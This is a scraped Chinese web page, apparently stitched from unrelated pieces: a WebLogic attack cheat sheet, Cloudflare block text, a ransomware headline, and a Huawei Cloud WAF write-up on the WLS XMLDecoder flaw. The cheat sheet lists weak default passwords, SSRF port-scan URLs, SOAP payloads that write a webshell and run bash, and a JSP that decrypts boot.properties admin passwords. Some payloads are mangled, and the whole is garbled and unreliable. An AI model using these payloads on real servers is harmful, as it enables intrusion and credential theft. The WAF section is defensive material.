Weblogic的CoordinatorPortUSB Type C接口接口有什么用

1. 管理员登录页面弱密码
Weblogic的端口一般为7001,弱密码一般为weblogic/Oracle@123&or&weblogic,或者根据具体情况进行猜测,公司名,人名等等,再有就可以用burpsuite的intruder进行暴力破解,一旦成功就可以上传war包getshell.
2. weblogic ssrf
Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机。如果存在此url&都会存在ssrf.下面我们监听一下192.168.1.59:139的139端口(开启)跟138端口(未开启)的返回,端口的开启情况
http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:139&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:138&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
3. weblogic反序列化
Wenlogic反序列化的漏洞已经被爆出很长时间,网上可以找出各种各样的工具,在这里我就不再多提了。
4. weblogic_uac
第一步 抓取http://x.x.x.x:7001/wls-wsat/CoordinatorPortType&对其发起POST请求(任意包都可以,只要url对就可以)
第二步 加入Content-Type:text/xml第三步 在body中放入payload
&soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&
&soapenv:Header&
&work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&
&java&&java version="1.4.0" class="java.beans.XMLDecoder"&
&object class="java.io.PrintWriter"&
&string&servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp&/string&&void method="println"&
&string&&![CDATA[`此处放马(因为马的代码量太长顾不在此处展示ps:此处上传的不要带有中文要不会报错,可删掉中文上传,也可进行编码处理)`
]]&&/string&&/void&&void method="close"/&
&/work:WorkContext&
&/soapenv:Header&
&soapenv:Body/&
&/soapenv:Envelope&
以上为默认路径,如果不是默认路径同时又是linux系统可用以下payload爆出路径
&soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&
&soapenv:Header&
&work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&
&java version="1.8.0_131" class="java.beans.xmlDecoder"&
&void class="java.lang.ProcessBuilder"&
&array class="java.lang.String" length="3"&
&void index="0"&
&string&/bin/bash&/string&
&void index="1"&
&string&-c&/string&
&void index="2"&
&string&find $DOMAIN_HOME -type d -name bea_wls_internal|do find $f -type d -done|do echo $ff &$ff/a.done&/string&
&void method="start"/&&/void&
&/work:WorkContext&
&/soapenv:Header&
&soapenv:Body/&
&/soapenv:Envelope&
5. weblogic 在线与离线解密
如有webshell可进行在线解密把以下代码放入服务器进行访问,s=""中填写weblogic的加密密码,可在boot.properties文件中找到。默认路径为../../../Server/security/boot.properties
&%@page pageEncoding="utf-8"%&
&%@page import="weblogic.security.internal.*,weblogic.security.internal.encryption.*"%&
EncryptionService es =
ClearOrEncryptedService ces =
String s =
s="{AES}wfFNcH6k+9Nz22r1gCMnylgUr9Ho5kz8nDgib/TuOZU=";
es = SerializedSystemIni.getEncryptionService();
if (es == null) {
out.println("Unable to initialize encryption service");
ces = new ClearOrEncryptedService(es);
if (s != null) {
out.println("\nDecrypted Password is:" + ces.decrypt(s));
离线解密需要两个文件SerializedSystemIni.dat和boot.properties
阅读(...) 评论()Access denied | xbear.me used Cloudflare to restrict access
Please enable cookies.
What happened?
The owner of this website (xbear.me) has banned your access based on your browser's signature (43d297fe8d70993d-ua98).勒索软件Satan使用的新技术分析 - 快资讯
需要开启 JavaScript 才能正常打开页面&&&&&&博客详情&&&&&&博客详情
WebLogic漏洞分析——利用华为云WAF实现防御
0x00 漏洞背景近期,WebLogic爆出相关安全漏洞和漏洞的exploit,并在网络中广泛流传。由于此次漏洞利用方式简单,通过构造HTTP请求就能直接获取目标服务器的控制权限,进行远程命令执行,因此影响范围很广。比如最近大量部署了WebLogic服务的主机被植入挖矿恶意程序,就是此漏洞的利用方式之一。此次漏洞产生的原因在于WebLogic的WLS组件直接使用XMLDecoder来解析XML数据。而Oracle官方在今年四月份提供的补丁检查能力较弱,很容易被bypass。因此,建议使用WebLogic服务的用户下载安装Oracle官方在今年十月份提供的补丁程序。0x01 漏洞分析此次漏洞形成的原因在于,WLS组件wls-wast.war中使用了WebLogic自带的webservice服务,通过WLSServeletAdapter处理SOAP请求。其中,WorkContextServerTube类中的相关函数负责处理POST请求中的XML数据,readHeaderOld方法负责处理&work:WorkContext&所包含的数据,最终由XMLDecoder来解析(反序列化),从而产生了反序列化漏洞。关于XMLDecoder安全性及利用可参考: 此次漏洞出现两处CVE编号(CVE-,CVE-)是由于Oracle官方在今年四月份的补丁中只对XML中存在&Object&节点的情况做了检查,但是很容易被bypass(如改为&void&即可)。因此,Oracle在十月份对该补丁又进行了一次更新。0x02漏洞复现测试环境 Docker 1.12.6 / WebLogic 10.3.6.0 / JDK 1.6 / CentOS构造一个恶意HTTP POST请求,使得目标主机主动对控制端服务器发起连接请求,从而实现shell反弹。WebLogic漏洞利用POC(利用postman向目标站点发送恶意HTTP请求)Shell反弹效果(通过nc在7777端口发送ls命令,可看到图中上方控制台打印出了目标主机的文件目录)0x03 华为云WAF防御WebLogic漏洞12月22日晚,华为云安全团队紧急下发了防御WebLogic漏洞的虚拟补丁。 下面将介绍如何使用华为云WAF防御WebLogic漏洞:1.使用华为云WAF的内置规则,一键开启防护。(对WAF实例开启防护后,在防护策略界面选择拦截并保存策略,如下图所示)对目标站点发送payload,进入安全总览页面,可以看到通过华为云WAF的内置规则,此次漏洞利用的请求行为被成功拦截。2.使用华为云WAF的精准防护策略,配置自定义规则。进入WAF实例-&防护策略-&精准防护界面,点击添加规则,按下图所示添加自定义规则。(规则内容为/wls-wsat/CoordinatorPortType)对目标站点发送payload,再次进入华为云WAF控制台,进入安全总览界面,可以看到华为云WAF成功拦截了此次WebLogic漏洞利用攻击。
攻击请求被华为云WAF拦截的界面0x04 防御策略与建议1.华为云WAF针对此次WebLogic的相关漏洞,已经在第一时间更新了内置规则。可以将站点接入华为云WAF,一键开启防护。(华为云WAF正在免费公测,仅剩一个月!)申请链接(需注册/登录华为云):2.若您的业务接入了其他WAF产品,可通过添加自定义规则实现漏洞防御,参考上文中配置华为云WAF精准防护的规则。3.临时防护建议:若WebLogic服务集群未使用WLS组件,可在临时备份后,根据实际环境路径将此组件删除。待具备此漏洞的防护能力后再进行恢复。·删除wlls-wsat组件:rm –f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.warrm –f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war rm - rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat ·重启WebLogic域控制器服务:DOMAIN_NAME /bin/stopWeblogic.shDOMAIN_NAME /bin/startManagedWebLogic.sh4.官方补丁更新:Oracle官方对于WebLogic WLS 组件漏洞(CVE-)在10月份的更新补丁中已经进行了修复,建议及时下载安装,并升级WebLogic。参考
链接复制成功
复制链接到剪贴板
分享文章到微博
分享文章到朋友圈
展开全部内容
展开全部内容
没有评论了
您确认删除博客吗?
账号与支付
关注华为云
华为云微信
手机扫码分享给好友

我要回帖

更多关于 Type接口 的文章

 

随机推荐